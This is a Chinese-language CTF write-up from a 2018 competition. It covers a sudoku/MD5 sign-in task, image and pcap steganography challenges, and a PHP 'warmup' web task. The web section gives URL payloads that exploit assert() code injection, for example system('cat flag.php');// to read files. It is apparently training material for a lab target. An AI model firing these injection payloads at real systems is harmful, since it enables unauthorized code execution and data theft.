比赛时间:2018年12月01日 09:00 - 18:00
比赛地址:https://race.ichunqiu.com/byb
签到
- 题目描述 签到.png
- 解题思路
解出数独,将解密后的81位数字按照从左到右、从上到下的顺序记录并进行md5加密即为flag - 解题步骤
1.求解数独 推荐:http://www.llang.net/sudoku/calsudoku.html
解数独.png 2.md5加密
MD5加密.png
a="473615928216984753598237164651892437942376815387451296834529671125768349769143582"
from hashlib import md5
print('flag{'+md5(a).hexdigest()+'}') //hexdigest返回的是16进制的str形式
#flag{cee3860fb3f4a52e615fa8aaf3c91f2b}
- FLAG值:
flag{cee3860fb3f4a52e615fa8aaf3c91f2b}
Misc
马男波杰克
- 题目描述 马男波杰克.png
-
解题思路
由图片 atool 名字可知是 atool 图片隐写 -
解题步骤
解密.png
百度 atool 在线解密,上传图片可解得 flag
网址:http://www.atool.org/steganography.php
-
FLAG值:
flag{jioiuojoi666}
血小板天下第一可爱
- 题目描述 图片.png
-
解题思路
将二维码修复LSB隐写 -
解题步骤
1.打开压缩包发现一张破损的二维码图片和一张 png 图片
2.用PS截左下角来补齐上边两个角修复二维码,扫描并将结果 base64 解密,在进行URL得到 key 数据:key: Lsb_1s_gr3at
修复后的二维码.png
base64解密.png3.使用命令:python lsb.py extract 1.png 1.txt Lsb_1s_gr3at,恢复出 flag
LSB隐写脚本:https://github.com/cyberinc/cloacked-pixel
隐写技巧:PNG文件中的LSB隐写 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com http://www.4hou.com/technology/2515.html
- FLAG值:
flag{1_l0ve_LSB~}
flag_universe
- 题目描述 题目.png
- 解题思路
1.数据包抓取的是一段 ftp 协议通讯的流量, 其中涉及两个 ip ,172.1.0.1是服务器的 ip , 172.1.0.2是客户端的 ip 。流量过程中涉及多次图片上传下载的操作,而且都是对同一张图片进行操作
2.分析流量可以发现客户端多次下载了文件名为 universe.png 的图片,而且只上传了一次叫做 new_universe.png 的图片,两张图片看起来完全一样,不过第二张图片的大小会稍大一些。通过 wireshark 筛选出上传的数据包,并且导出图片文件
3.导出文件后我们用 StegSolve 的 analyse data extract 功能可以看到图片通过 lsb 方法隐写的文本信息,即可获得 flag -
解题步骤
1.分析数据流,可以发现第十四个png图片也就是new_universe.png有点异常 tcp流.png 2.导出图片,图片隐写分析
隐写分析.png
另外解法:安装:gem install zsteg zsteg.png
- FLAG值:
flag{Plate_err_klaus_Mail_Life}
WEB
warmup
- 题目描述 warmup.png
- 解题思路
web基础绕过,通过注释符或者结束符绕过 -
解题步骤
1.代码审计 index.png
2.审计发现assert可以进行任意代码执行,但需要绕过后半部分的判断,我们可以通过结束符或注释符使后半部分被注释掉,即可执行命令
/?u=Hello World&i=system('cat flag.php');//
/?u=Hello World&i=system('cat flag.php');%23
/?u=Hello World&i=highlight_file('flag.php');?>
/?u=Hello World&i=highlight_file('flag.php');//
当前文件夹.png
simple ser
-
题目描述
simple ser.png
未完待续。。。。
网友评论